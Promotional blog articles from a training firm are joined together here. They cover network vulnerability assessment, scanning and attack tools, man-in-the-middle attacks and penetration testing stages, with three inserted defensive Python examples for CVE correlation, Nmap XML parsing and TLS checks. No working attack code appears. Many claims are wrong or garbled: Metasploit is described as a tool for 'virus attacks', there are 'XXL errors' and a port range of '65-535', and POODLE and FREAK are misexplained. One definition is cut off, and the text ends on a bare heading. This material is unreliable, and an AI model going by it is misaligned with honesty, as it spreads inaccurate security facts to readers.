Now let us understand what a network vulnerability assessment is as an entity of penetration testing. Network penetration testing is a penetration testing technique that involves reviewing and analyzing a network in order to discover any possible security loopholes and vulnerabilities. Network administrators and network security staff use this technique to do a thorough evaluation of their security architecture as well as to defend the computer network against any form of threats and vulnerabilities. It also helps them to assess the strength of the network. But the key objective of this technique generally is to discover vulnerabilities that may compromise the overall privacy, security and operations of a computer network.
Network penetration testing Methodology
1. Data and Information gathering and project set up
- Reviewing the project to obtain all assumptions
- Listing and detailing the scanned IP addresses
- Configuring the IDS and IPSes to accept the originating IP addresses
- An optional scan of all user credentials
- Obtaining contact information for both parties
- Planning the scans and including the time it is being performed
2. Setting up the scanning tools
This step involves configuring all the vulnerability scanning tools for “safe mode”.
3. Performing the vulnerability scan
This involves performing an in-depth scan of all provided IP addresses and identifying any security weaknesses and vulnerabilities on user credentials after they have been scanned.
4. Research and Verification of vulnerabilities
- Verifying all the discovered vulnerabilities
- Identifying false positives
- Determining any potential impacts of the vulnerabilities being exploited
- Prioritizing remediation efforts
- Developing specific plans and recommendations for the remediation
5. Create reports and a project close-out
- Delivering final and concluding reports
- Teleconferencing of the scheduled project conclusions
- Ensuring a full understanding of the remediation actions being recommended
- Facilitating knowledge transfer in an effective form
Network Vulnerability Assessment Tools
In order to carry out an automated security audit in any organization, vulnerability scanners play a very critical role. This is because they can scan the website, network and other internal systems for thousands of security risks and can automatically prioritize them alongside the right patches. Some can apply the patches automatically.
Scanning websites is an entirely different ballgame from network scans. In the case of websites, the scope of the scan ranges from Layer 2 to 7, considering the intrusiveness of the latest vulnerabilities. The correct approach for scanning websites starts from Web-level access, right up to scanning all back-end components such as databases. While most Web security scanners are automated, there could be a need for manual scripting, based on the situation.
1. OpenVAS: This is short for Open Vulnerability Assessment System and is a free network security tool that has most of its components licensed under the GNU General Public License (GPL). This tool is very effective in scanning for thousands of vulnerabilities and supports concurrent and scheduled scans and tasks. Its main component is available as Linux packages and as downloadable virtual appliances for the purpose of testing and evaluation. OpenVAS does not run on Windows, but it offers clients for Windows platforms. It runs mainly on Linux platforms, and it can perform scans and receive over 33,000 updates daily of Network Vulnerability Tests.
OpenVAS has a manager that controls its intelligence; it is command-line based, with a full service daemon for user management and feed management. It is not quick or easy to install, but it has one of the richest feature sets in IT security scanning.
2. Retina CS Community: This is a vulnerability scanning and patching tool for Microsoft and most third-party applications like Firefox, Adobe etc. It can scan for vulnerabilities in mobile devices, virtualized applications, servers, web applications and private clouds as well. It identifies missing patches and configuration issues. Software called Retina Network Community has to be installed first, before actually installing the Retina CS Community software. It works on Windows Server 2008 or later and Microsoft SQL 2008 or later, and it also requires .NET Framework 3.5 to be installed and the IIS server to be enabled.
It gives you the option of choosing from a variety of scans with reporting templates, and you can specify IP address ranges. You can also provide any credentials required for the scanned assets, and have your reports delivered in a ready and organized format, including email alerts. Most businesses, however, may find its system requirements very stringent since it requires Windows Server.
3. Microsoft Baseline Security Analyzer (MBSA): This is a tool that can perform both local and remote scans on Windows servers and desktops. It is very efficient because it can identify missing service packs, security patches and common security misconfigurations. Platforms that support it are Windows XP, Windows 8 and 8.1, Windows Server 2012 and Windows Server 2012 R2. It is an easy-to-understand and straightforward tool. It provides the option of selecting a single Windows machine to scan, where you can choose a name, specify IP addresses and even choose a domain. You can choose what you want to scan for, which can be Windows, IIS or SQL administrative vulnerabilities, Windows updates or weak passwords.
5. SecureCheq: This is a tool that can perform local scans on both Windows desktops and servers and is capable of identifying many insecure advanced Windows settings as defined by standards such as COBIT, ISO and CIS. It deals mainly with common configuration errors related to OS hardening, communication security, data protection, audit logs and user account activities. Its free version can only perform less than 24 scans, which is about a quarter of what its full version scans. SecureCheq is a simple tool which lists all the checked settings with passed or failed results. Even though it is easy to use and can scan for advanced configuration settings, it cannot reach deep enough to scan for general Windows vulnerabilities and network-based threats. It does, however, complement MBSA well: scan for basic threats with MBSA, then perform a follow-up scan using SecureCheq.
6. Qualys FreeScan: This tool can perform about 10 free scans of URLs and IPs of local servers and machines on the internet. It can be downloaded from the web portal and installed and run on virtual machines for scanning internal networks. It can scan for issues in SSL and vulnerabilities in their related networks.
At first it may seem to be an online tool that only scans via the internet, but if you put in a local IP address, it prompts you to download a virtual appliance to your system as a VMware or VirtualBox image. This tool allows you to scan local networks and gives an interactive report of the threats and patches.
7. Wireshark: Wireshark, previously called Ethereal, is one of the most popular tools for network vulnerability testing or assessment. This is because it gives you a clear picture of what is happening on your network. It works in promiscuous mode in order to capture all the traffic on a TCP broadcast domain. It has customizable filters that can be configured to intercept specific traffic, such as communication between two IP addresses or UDP-based DNS queries on the network.
Data obtained can be dumped into a capture file for later review. It can also look for stray IP addresses, unnecessary packet drops, spoofed data packets and any suspicious single IP address. Although Wireshark gives one a clearer and broader picture of network activity, it does not have its own intelligence and should therefore be used as a data provider.
8. Nmap: This has remained one of the most popular scanning tools for over a decade now. It is capable of crafting data packets and performing scans at a granular TCP level, such as ACK and SYN scans. Some of the characteristics of this tool include:
- Algorithms for built-in signatures designed to guess OSes and its versions based on the TCP handshake
- It can detect remote devices on the network as well as firewalls, routers, and their models
- It can check for open and running ports and which ports can be exploited for simulation of attacks
- It gives results in plain text and verbose
- It is scripted to automate routine task and obtain evidence for audit reports
9. Metasploit: Metasploit is a tool that comes to play after scanning and sniffing have been done. It provides the following capabilities;
- It is a rigorous tool for performing scans against a set of IP addresses.
- It can be used for anti-forensics
- Programmers can write code to exploit vulnerabilities and test on Metasploit whether it works
- It is a commercially available tool for performing virus attacks.
10. Aircrack: This is a network scanning tool that acts as a sniffer, packet crafter and decoder. It targets a wireless network by subjecting a packet traffic to capture vital information about a certain underlying encryption. A Decryptor is then used to perform a brute-force on the captured file to find passwords. Aircrack can be found in kali-linux which is the most preferable.
11. Nikto: This is an interactive open source tool for scanning websites; it supports both HTTPS and HTTP. Nikto works as follows:
- It crawls a website like a human would, in a short amount of time.
- It uses a technique known as mutation to create combinations of various HTTP tests to perform an attack.
- It finds critical loopholes like improper cookie handling, XXL errors, upload misconfigurations etc.
- It dumps all the findings in a verbose mode, which can also help in knowing more about the vulnerabilities in a website.
Care should be applied when interpreting Nikto logs, because so many things get noticed that they can trigger a false alarm.
12. Samurai framework: It is used for deep-diving after a baseline check has been done by Nikto. It is a powerful scanning utility which can be used to target a specific set of vulnerabilities. It is a pure penetration testing tool which focuses on other penetration tools such as WebScarab for HTTP mapping.
13. SQLmap: This is a first-generation tool capable of exploiting SQL injection errors, and it can also take over the database server. It performs speedy fingerprinting of the database to find the underlying OS and file system in order to fetch data from the server.
Note that a regularly scheduled network vulnerability scan can help an organization identify loopholes and weaknesses in a network before any cybercriminal can attempt an attack. The aim of performing a network vulnerability scan is to identify devices on your network without compromising the systems on it. Therefore, ensure that you conduct a periodic network vulnerability scan in order to discover and mitigate any possible weaknesses on your network before they can be exploited.
Why do you need the services of a Network Penetration Tester?
A network penetration tester is specially trained with the expertise to effectively conduct penetration testing and network assessments. Note that if a penetration test is improperly conducted, it could be detrimental to your organization and its daily operations. Some of the areas a network security specialist covers are:
- Data breach prevention
- Application security
- Security control testing
- Gap analysis maintenance
- Compliance testing and analysis
Who do you contact?
We offer a range of services, from certifications and training in vulnerability and penetration testing to many more courses. We at Soutech web consults have a team of professionals that can not only train you and your staff on vulnerability and penetration testing, which is a part of cyber security, but also conduct the tests. Endeavour to visit us at Soutech web consults or subscribe to our website to find out how we can help your organization and your business mitigate any form of network vulnerability by implementing any of our test processes and technologies.
One of the major challenges the cybersecurity world is facing is the way vulnerabilities are classified or grouped. Many security vendors, professionals and product developers have given different names to the same type of vulnerability, and this has become confusing for security practitioners when performing tests. This is the reason why some organisations such as CVE (Common Vulnerabilities and Exposures) have come together to develop a common language for vulnerabilities.
CVE, which is sponsored by the Mitre Corporation, has set up a standard for naming security vulnerabilities conventionally in order to make them easier to discuss, test and document. A complete list of CVEs for vulnerability testing can be downloaded from CVE.
The CVE standard has been deployed by many security products, to name but a few:
- Nessus Security scanner
- STAT (Security Threat Avoidance Technology)
- Internet Scanner by ISS (Internet Security Systems)
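The benefit of a common name shows when findings from several scanners are merged. The following is an added example, not code from the original article: it groups findings by CVE ID so that three differently worded reports of the same flaw collapse into one entry. The scanner names come from the list above; the hosts, finding titles and CVE numbers are constructed placeholders.

```python
import re
from collections import defaultdict

# CVE ID syntax: "CVE-", a four-digit year, a hyphen, then a sequence number
# of four or more digits.
CVE_RE = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.IGNORECASE)

# Constructed sample findings: each scanner words the same flaw differently.
FINDINGS = [
    {"scanner": "Nessus", "host": "192.0.2.10",
     "title": "Web server remote overflow (CVE-2099-0001)"},
    {"scanner": "STAT", "host": "192.0.2.10",
     "title": "HTTP daemon buffer overrun, see cve-2099-0001"},
    {"scanner": "Internet Scanner", "host": "192.0.2.10",
     "title": "httpd-bo: CVE-2099-0001 and CVE-2099-12345"},
    {"scanner": "Nessus", "host": "192.0.2.20",
     "title": "Default SNMP community string"},
]


def extract_cves(text):
    """Return the normalised CVE IDs found in free text, in order, no repeats."""
    found = []
    for year, seq in CVE_RE.findall(text):
        cve = f"CVE-{year}-{seq}"
        if cve not in found:
            found.append(cve)
    return found


def correlate(findings):
    """Group findings by (host, CVE ID) and list which scanners reported each.

    Findings that carry no CVE ID cannot be matched across tools by name,
    so they are returned separately for manual review.
    """
    grouped = defaultdict(set)
    unmapped = []
    for finding in findings:
        cves = extract_cves(finding["title"])
        if not cves:
            unmapped.append(finding)
            continue
        for cve in cves:
            grouped[(finding["host"], cve)].add(finding["scanner"])
    return {key: sorted(names) for key, names in grouped.items()}, unmapped


if __name__ == "__main__":
    merged, unmapped = correlate(FINDINGS)
    for (host, cve), scanners in sorted(merged.items()):
        print(f"{host} {cve}: reported by {', '.join(scanners)}")
    print(f"{len(unmapped)} finding(s) without a CVE ID need manual matching")
```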
Types of Vulnerability Scanners
Vulnerability scanners can be classified into:
- Host-based vulnerability scanners
  - They identify the issues that are inherent in the host system.
  - The scanning is performed using host-based scanners to check for vulnerabilities.
  - When the host-based tool loads its mediator software onto the target system, it traces the events that have occurred and sends a report to the security analyst, who analyses it and decides the next move.
- Network-based vulnerability scanners
  - The scanning is performed using network-based scanners.
  - The function of the network-based scanners is to detect open ports and identify unknown services and active, running ports.
  - They then give a result of all the possible vulnerabilities that are associated with these services.
- Database-based vulnerability scanners
  - The database-based vulnerability scanners identify the security loopholes in the database.
  - Here, tools and techniques are applied to test if the database is susceptible to SQL injection. The tester performs an SQL injection by injecting SQL queries into the database in order to read any sensitive data from it. If there are any loopholes, the cyber security expert then updates the data in the database and tries to patch the security issue.
Steps for Performing Vulnerability Testing
The full methodologies on how to perform Vulnerability testing can be found in my previous article on vulnerability testing. I will describe briefly the steps that can be used to carry out any vulnerability test.
1. Check for Live Hosts: Here we have to check if the host is alive on the network. We can also
- detect firewalls in the network
- probe for open ports such as UDP and TCP ports and other ports
  - TCP ports such as 1-111, 135, 139, 443, 445 etc.
  - UDP ports such as 53, 111, 135, 137, 161 and 500
Whether or not the target is alive or offline, the scan can still be done.
2. Detect Firewalls: Here we try to determine whether there is a firewall in front of the target system. This is because some systems may appear to be offline when in the actual sense they are just protected by a firewall, and they can still be open to attacks.
This test also attempts to gather a lot of network information from the target network, especially when doing UDP and TCP probing.
3. Determine Open services and ports: In this step, we scan the UDP and TCP ports in order to discover the ports and services that are open. The ports to be probed are UDP and TCP ports 65-535, and in most setups it is recommended to use the best scan probes to save network bandwidth and time. During an in-depth scan, the use of full profiled scan probes is recommended.
4. Detection of Operating Systems and Versions: This involves discovering the OS versions and the services in order to optimize it. Once UDP and TCP port scanning is over, the pen tester uses different techniques to identify the OS that is running on the target host and network.
5. Perform a profiled Vulnerability scan: A profiled scan is applied in order to get an optimized vulnerability scanning result. Profiled scans include;
- Best scan to get popular ports
- Quick Scan to get most common ports
- Firewall scan by performing stealth scan
- Aggressive Scan by performing full scan, exploits and for DOS attacks
6. Developing a detailed Report: There are different formats for generating reports and the outputs of risk analysis and remediation suggestions. You can read the OWASP full vulnerability scan documents to get a template for presenting your reports.
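Steps 1 to 6 end in a report built from scan output. The following is an added example, not code from the original article: it parses Nmap's XML output (written with `-oX`) into the facts those steps collect, namely live hosts, open ports and services, the OS guess, and ports reported as filtered, which is how Nmap marks probes dropped by a firewall. The XML is a constructed sample and the function names are illustrative.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout Nmap writes with -oX; addresses are from the
# 192.0.2.0/24 documentation range. Parse only XML your own scanner produced.
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="445"><state state="filtered"/>
        <service name="microsoft-ds"/></port>
      <port protocol="udp" portid="161"><state state="open"/>
        <service name="snmp"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="88"/>
        <osmatch name="Linux 3.10 - 4.11" accuracy="96"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
</nmaprun>"""


def parse_scan(xml_text):
    """Turn Nmap XML into one dict per host: address, up/down, OS guess, ports."""
    hosts = []
    for host in ET.fromstring(xml_text).iter("host"):
        address = host.find("address")
        status = host.find("status")
        # Keep the OS guess Nmap was most confident about, if OS detection ran.
        best_os = max(host.iter("osmatch"),
                      key=lambda m: int(m.get("accuracy", "0")), default=None)
        ports = []
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            label = "" if svc is None else " ".join(
                v for v in (svc.get("name"), svc.get("product"), svc.get("version")) if v)
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": "unknown" if state is None else state.get("state"),
                "service": label,
            })
        hosts.append({
            "addr": "?" if address is None else address.get("addr"),
            "state": "unknown" if status is None else status.get("state"),
            "os": None if best_os is None else best_os.get("name"),
            "ports": ports,
        })
    return hosts


def summarize(hosts):
    """Collect the facts a report needs from the parsed hosts."""
    return {
        "live_hosts": [h["addr"] for h in hosts if h["state"] == "up"],
        "open_ports": [(h["addr"], p["proto"], p["port"], p["service"])
                       for h in hosts for p in h["ports"] if p["state"] == "open"],
        # "filtered" means probes went unanswered, typically because of a firewall.
        "firewalled_hosts": sorted({h["addr"] for h in hosts
                                    for p in h["ports"] if "filtered" in p["state"]}),
    }


def report_lines(hosts):
    """Render a plain-text report section, one line per port on each live host."""
    summary = summarize(hosts)
    lines = [f"Live hosts: {len(summary['live_hosts'])} of {len(hosts)} scanned"]
    for h in hosts:
        if h["state"] != "up":
            continue
        lines.append(f"{h['addr']} (OS guess: {h['os'] or 'none'})")
        for p in h["ports"]:
            lines.append(f"  {p['port']}/{p['proto']} {p['state']} {p['service']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report_lines(parse_scan(SAMPLE_XML))))
```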
Vulnerability Testing Tools
Vulnerability testing tools can be classified into Host-based tools and Data-based tools. I will describe a few tools which are efficient for performing vulnerability assessment.
| Category | Tool | Description |
|---|---|---|
| Host-based | STAT | It scans multiple systems on the network. |
| Host-based | TARA | An acronym for Tiger Analytical Research Assistant. It is a Unix-based system scanner which detects a set of known vulnerabilities in the local host of the network. |
| Host-based | Cain and Abel | It can be used for cracking HTTP passwords and for retrieving passwords by sniffing the network. |
| Host-based | Metasploit | It is an open source platform on Linux for developing, testing and exploiting code. |
| Host-based | Wireshark | This is an open source network protocol analyzing tool that runs on both Linux and Windows platforms. Used to sniff the services running on the network. |
| Host-based | Nmap | This is also an open source utility tool for carrying out security audits. |
| Host-based | Nessus | This is an agent-less platform for auditing, reporting and carrying out patch management integration. |
| Database-based | SQL diet | A tool door for the SQL server for performing dictionary attacks. |
| Database-based | Secure Auditor | It enables a user to carry out enumeration, network scanning and auditing, and also to perform penetration testing and forensics on the operating systems. |
| Database-based | DB-scan | It is a tool used for the detection of trojans on the database, and also for detecting hidden trojans by performing baseline scanning. |
Advantages of Vulnerability Assessment
The common advantages of performing vulnerability assessments are;
- There are readily available open source tools for performing vulnerability assessments.
- It provides a platform to identify, detect and curb almost all vulnerabilities inherent on any system.
- Some of the aforementioned tools are automated for scanning.
- These vulnerability assessment tools are easy to run on a regular basis.
Disadvantages of Vulnerability Assessment
- There is an increase in the rate of false positive results
- A vulnerability assessment tool can easily be detected by an Intrusion Detection System (IDS)/Firewall.
- Sometimes the most recent vulnerabilities are hardly noticed.
Vulnerability Assessment vs Penetration Testing
| Criterion | Vulnerability Assessment | Penetration Testing |
|---|---|---|
| Functionality | To discover vulnerabilities | To identify and exploit known vulnerabilities |
| Mechanism | For discovery & scanning | Perform simulations |
| Focal point | Considers breadth over depth | Considers depth over breadth |
| Coverage of completeness | High | Low |
| Cost of use | Low to moderate | High |
| Tester | House staff | An attacker or penetration tester |
| How often it is run | Run after every single equipment is loaded | Run once in a year or quarterly depending on the organization's policy |
| Results provided | Gives partial and inconclusive details about the vulnerabilities | Gives complete details of all the identified vulnerabilities |
Vulnerability testing depends on two major mechanisms, vulnerability assessment and penetration testing, which I have differentiated in summary above. These two test methods differ from each other in the tasks they perform and in the weight of their performance levels.
However, to achieve comprehensive and well-detailed vulnerability testing with reports, a combination of both methods is always recommended.
We at Soutech web consults have a professional team that can carry out well organized and detailed vulnerability testing on your organization. Do well to contact us today on our website.
I will simply describe a man-in-the-middle attack as eavesdropping. In this form of attack, an attacker intercepts or gets in between the transmission of data from computer A (client) to computer B (server/website). They can then inject tools that are programmed to listen in on the transmissions with the aim of capturing valuable information. On many occasions, the data is modified in transmission in order to trick the user into giving out sensitive information such as their login credentials. Of course, if the user becomes a victim of this attack, his original data will be forwarded unaltered to the attacker's preferred destination.
How Man-In-The-Middle attacks work
This attack comes in two forms
- The form that involves being within the physical proximity of the target.
- The form that involves the injection of a malware which is also known as a man-in-the-browser (MITB) attack.
In a traditional MITM attack, an attacker has to gain access to a Wi-Fi router that is not secured. You will often find this kind of connection in public areas with free Wi-Fi hotspots, and even in homes. All the hacker does is scan the router in search of any weaknesses in its configuration and poor use of passwords. As soon as the hacker finds a loophole, they proceed to inject their tools to sniff the user's traffic and the sites the computer visits.
The man-in-the-browser attack is a newer variant of the man-in-the-middle attack and has gained a lot of popularity with cybercriminals because of its ease of execution. Here, the attacker needs a means to inject malware into a computer, after which it installs itself in the user's browser without their knowledge. Data sent between the victim and specified target sites, such as financial institutions, is then recorded. The malware transmits the data back to the attacker's system once it has collected the specific data it was programmed to collect.
A very good example of this type of attack was the recent discovery of the POODLE bug. This bug allowed attackers to capture data transmitted between browsers and websites, such as login credentials for e-commerce and other financial types of online accounts, in order to take control of those accounts.
Another example was FREAK, an attack presented by researchers on the 3rd of March 2015, which allows an attacker to sniff encrypted traffic flowing between a visitor and a website, in the form of a MITB attack.
The vulnerability was a result of old encryption standards developed in the 90s, which were neglected while in the custody of Google and Apple. Hackers were able to easily decrypt messages using the old code.
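Both bugs depend on a client or server still accepting 1990s-era protocol versions or cipher suites: POODLE targets SSL 3.0 and FREAK forces export-grade RSA keys. The following is an added example, not code from the original article: it builds a Python client context that refuses them and triages constructed (host, protocol, cipher) rows of the kind a TLS scan report lists. The function names and host names are illustrative.

```python
import re
import ssl

# SSL 2.0/3.0 date from the 1990s; TLS 1.0 and 1.1 are formally deprecated too.
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1", "TLSv1.0", "TLSv1.1"}
# Name fragments of broken algorithms in OpenSSL cipher-suite names.
# "DES" also matches 3DES (DES-CBC3-SHA), which is likewise deprecated.
WEAK_TOKENS = {"NULL", "RC4", "RC2", "DES", "MD5"}


def hardened_client_context():
    """Client context that verifies certificates and refuses legacy TLS."""
    ctx = ssl.create_default_context()            # CERT_REQUIRED + hostname check
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # no SSL 3.0, so no POODLE downgrade
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20")  # forward-secret AEAD suites only
    return ctx


def cipher_issues(cipher):
    """Classify one cipher-suite name (OpenSSL or TLS 1.3 naming)."""
    tokens = set(re.split(r"[-_]", cipher.upper()))
    issues = []
    if "EXP" in tokens or "EXPORT" in tokens:
        issues.append("export-cipher")            # what FREAK downgrades a session to
    if tokens & WEAK_TOKENS:
        issues.append("weak-cipher")
    return issues


def assess(protocol, cipher):
    """Issues for a negotiated protocol/cipher pair; an empty list means acceptable."""
    issues = ["legacy-protocol"] if protocol in LEGACY_PROTOCOLS else []
    return issues + cipher_issues(cipher)


def weak_suites_enabled(ctx):
    """Names of weak suites a context would still offer (should be empty)."""
    return [c["name"] for c in ctx.get_ciphers() if cipher_issues(c["name"])]


# Constructed rows in the shape of a TLS scan report: host, protocol, cipher.
SCAN_ROWS = [
    ("legacy.example", "SSLv3", "AES128-SHA"),
    ("shop.example", "TLSv1.2", "EXP-RC4-MD5"),
    ("bank.example", "TLSv1.3", "TLS_AES_256_GCM_SHA384"),
]


def triage(rows):
    """Map each host with a problem to its list of issues."""
    flagged = {}
    for host, protocol, cipher in rows:
        issues = assess(protocol, cipher)
        if issues:
            flagged[host] = issues
    return flagged


if __name__ == "__main__":
    ctx = hardened_client_context()
    print("weak suites offered by client:", weak_suites_enabled(ctx))
    for host, issues in triage(SCAN_ROWS).items():
        print(host, "->", ", ".join(issues))
```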
How to avoid this form of attack
Here are a few practical steps you can take to reduce the risk of man-in-the-middle and man-in-the-browser attacks.
- Always look out for any potential phishing emails from attackers. To learn more about phishing, please take out time to read through my article on phishing. These phishing attacks come in the form of asking you to click a provided link which demands that you update your password and other login credentials. Instead of clicking those links, take some time to type the URL of the website into your browser and access it from there.
- Ensure that “HTTPS” is always in the URL bar of any website you’re visiting.
- Avoid, as much as possible, direct connection to any public Wi-Fi routers. If you need to connect, you can use a Virtual Private Network (VPN); you could also use a browser plug-in like HTTPS Everywhere or ForceTLS.
- Ensure that your private network is always secured. Endeavor also to change any default usernames and passwords on your home router and any other internet device.
- Finally, MITB attacks primarily make use of malware for execution, therefore you should protect your system with an up-to-date, detailed internet security solution (anti-virus).
To learn more about Man-In-The-Middle attacks, subscribe to our very detailed and comprehensive course modules in Certified Ethical Hacking (CEH). At Soutech Ventures, we have certified tutors to guide you through our course contents. Visit our website today to enroll: www.soutechventures.com
Penetration testing, colloquially referred to as a pen test, is a simulated attack performed on a computer system or its network infrastructure, with permission from management, to probe for security vulnerabilities and potential means of gaining access to data and other features of the system.
Penetration testing helps one find out how vulnerable a system is to an attack, whether the defense mechanisms created are sufficient, and which of the defense mechanisms or techniques employed can be defeated. A typical penetration testing process focuses on finding vulnerabilities depending on the nature of the approved activity for a given engagement.
Security testing will never prove the absence of security flaws in a system, but it can certainly prove their presence.
Brief History of Penetration Testing
For over 50 years, since the mid-1960s, as the sophistication of networks increased, white hat hackers have been working to make sure computer systems are protected from unauthorized access by hackers. They understood that if hackers gained access to their systems, they could even destroy information networks aside from stealing information. As computers gained the ability to share data or information across communication lines, the challenge of protecting information increased. If these lines were broken into, data could be compromised, contained or stolen.
As early as 1965, computer security experts warned the government and businesses that, because of the increasing capability of computers to share information and exchange vital data across communication lines, there would inevitably be attempts to penetrate those lines during the exchange of data. In 1967, at the annual joint computer conference, which had over 15,000 cyber security experts in attendance, there were serious deliberations on the possibility that computer communication lines could be penetrated by hackers. They coined the term penetration, which has perhaps become a major challenge in computer communication today.
This meeting brought about the idea of actually testing systems and networks to ensure that integrity is increased as computer networks expand. One such organisation was the RAND Corporation, which first discovered a major threat to internet communications. The RAND Corporation allied with the Advanced Research Projects Agency (ARPA) in the US to produce a report known as The Willis Report, named after its lead author. The Willis Report discussed this security issue and proposed policies to serve as countermeasures against security breaches.
Following this report, the government and organizations started to form teams with the sole responsibility of finding weaknesses and vulnerabilities in computer networks, along with measures to protect the systems from unauthorized or unethical hacking or penetration.
Today, there are numerous specialized options available for performing penetration testing. Many of these systems include tools that offer a range of features for testing the security of the operating system. For example, we have Kali Linux, which can be used for performing penetration testing and digital forensics. It contains 8 standard tools such as Burp Suite, Nmap, Aircrack-ng, Kismet, Wireshark, the Metasploit framework and John the Ripper. Kali Linux has all these tools and many more, and for one system to contain all these sophisticated tools goes to show how sophisticated today’s technology has gradually become and how many hackers are finding ways to create problems for computer-driven networks and computing environments, most especially the internet.
Objectives of Penetration Testing
The objectives of an intense pen test involve:
- Determining how an attacker can find any loopholes to unlawfully gain access to the system's assets in ways that can harm the fundamental security of the system's logs and files.
- Confirming that all the applicable controls, like the vulnerability management methodologies and segmentation required for the good functioning of the system, are in place.
Types of Penetration Testing
- Black box penetration testing: Also referred to as blind testing. Here, the client does not give out any prior information about the system architecture to the pen tester. It may offer little value to the pen tester since the client does not provide any information. It can require more money, more time and more resources to carry out.
- White box penetration testing: Also known as Here, the client provides the pen tester with comprehensive and complete details of the network and how it is being applied.
- Grey box penetration testing: The client may provide incomplete or partial information of the system network.
Stages of Penetration Testing
There are basically 5 stages of a penetration test.
1. Reconnaissance and planning: This stage involves gathering intelligence such as network, mail servers and domain names in the bid to understand how the target system works and the potential vulnerabilities it is facing.
It also involves a thorough definition of the scope and the goals of the penetration test, including the systems that are to be addressed and the methods of testing to be deployed.
2. Scanning: This stage requires an in-depth understanding of how the target applications will respond to any attempt of intrusion. Scanning can be performed in the following ways:
- Static analysis: This process involves a careful inspection of the code in the application to determine how it behaves when it is run. These tools have the capability of scanning the entire code in a single pass.
- Dynamic analysis: This involves a careful inspection of the code in the application while it is in the running state. It is a more practical approach to scanning in that it gives a real-time view of the application's performance.
3. Gaining Access: In this stage, the pen tester uses web application attack techniques such as SQLs, XXLs and backdoors to unravel the vulnerabilities on the target system. In a quest to understand the damages they can cause on the target, the tester will try to exploit the vulnerabilities discovered by intercepting traffic, stealing data and escalating privileges etc.
4. Maintaining Access: This stage aims at achieving a persistent presence in the exploited system using the known vulnerabilities. Advanced threats which are capable of remaining on the system for months are logged into the system in order to monitor changes, enhancements and any new information being loaded onto the system.
5. Results and Analysis: In this stage, all the results obtained from the penetration test are compiled comprehensively and in detail. This includes:
- All the vulnerabilities that have been exploited
- All sensitive data that has been accessed
- The amount of time spent during maintaining access without being detected.
The security personnel then analyse the results in a bid to reconfigure, where necessary, the organization’s WAF settings and address any other application security flaws. This is done to patch all the vulnerabilities and to protect information against any future attacks.
Classification of Penetration Testing
1. External Penetration Testing: An external penetration test is targeted at the assets owned by an organization that are accessible on the internet. Examples of such assets are:
- The organization's website
- Domain name servers
- Web applications
The major goal of the external pen test is to gain access and extract data.
2. Internal Penetration Testing: It attempts to mimic an attacker actually launching an attack on the network to find vulnerabilities or loopholes.
It involves an examination of the IT systems of an internal network for possible traces of vulnerabilities which can affect confidentiality, integrity and availability, thereby giving the organisation the clues it needs to take steps to address such vulnerabilities.
Penetration Testing Services
I will describe 4 distinct penetration testing service offerings that we can provide you:
- Vulnerability Scanning: This scanning technique provides a very transparent and mature offer, but the biggest challenge always lies in whether to resell a service offering or to buy one that can be used to internally scan the client's systems and networks. Every regulation requires scanning, which is the first and easiest step towards achieving security assurance. This is because all regulated customers need to scan.
- Penetration testing of Infrastructure: This uses tools such as Metasploit or Core Impact, which can be used to perform live exploits. Live ammunition is used, so you have to organize the test with the client in such a way that the amount of disruption during the tests is minimized. The pen tester should endeavor to test all externally visible IP addresses, because that is what the bad guys look for in order to penetrate the system and network. The tester should also attach to the conference room network, which is one of the softest parts of the customer's defense.
- Penetration of Applications: This is a very important step which involves an attempt to break into the applications, because so many attacks are directly targeted at applications. Web application tools such as HP’s WebInspect and IBM’s AppScan can be employed, but the tester can also find ways to exploit application logic errors. Nothing stands against a skilled application test, because once an initial application is compromised, direct access to the database where valuable data lives is easy. If the tester can access the database, then the customer's system is owned already, and scripts can be written to block every loophole an attacker could use.
- User Testing: This part of the penetration test is always fun for the penetration testers because they get to see how gullible and vulnerable most users are. The test may involve sending fake email messages to customer service representatives in a bid to gather information that can be used to penetrate their facilities. They even drop thumb drives in the parking lot and watch for people who will plug them in. Social engineering is one of the key ways of gathering information and should never be underestimated. Social engineering can be used on the client in order to catch them off guard.
Standards for Penetration Testing Methodologies
There are many accepted industry methodologies that may guide and help the pen tester through any test.
- Open Source Security Testing Methodology Manual (OSSTMM)
- OWASP Testing Guide
- The National Institute of Standards and Technology (NIST)
- Penetration Testing Execution Standard
- Penetration Testing Framework
These frameworks have set standards that any penetration testing activity should follow, and they should be strictly adhered to in order to guide the pen tester whenever necessary.
A typical penetration activity is detailed and must be carried out in an organized fashion. This is because organisational data and assets are very important and delicate things to handle, so there is a need to have an organised team of professionals handle your penetration testing services.
We at SOUTECH web consults are the perfect consulting firm for carrying out your penetration testing. We have professional staff and a team to conduct a well detailed and professional penetration testing. Subscribe for our services today.
Pen tests as we already know are intended to identify and confirm actual security breaches and to report such issues to management. This ensures that an organization experiences a balance in business and a good network security to ensure the smooth operation of business.
Just to reiterate, as this is a follow-up article to my basics on penetration testing: penetration testing, colloquially called pen test, refers to an ethical hacking method used to perform security testing on the computer network of an organization. It involves a lot of methodologies, which I have already explained in my previous write-up, and is designed to explore a network for potential known vulnerabilities and to test whether they are real. A properly performed penetration test allows a network professional to fix issues within the network in order to improve the network security and provide the needed protection for the entire network against future cyber-attacks and intrusions.
The terms vulnerability assessment and penetration testing are often confused and I have made an attempt to differentiate them because they mean different things.
Pen tests involve methods that require legal permission to exploit the network, while vulnerability assessment requires evaluating the network, its systems and services for potential security problems. While a pen test is designed to perform simulated attacks, vulnerability assessments only require pure analysis and vetting of an organization's network for vulnerabilities. Note that no attack is launched.
The Qualifications of a Penetration Tester
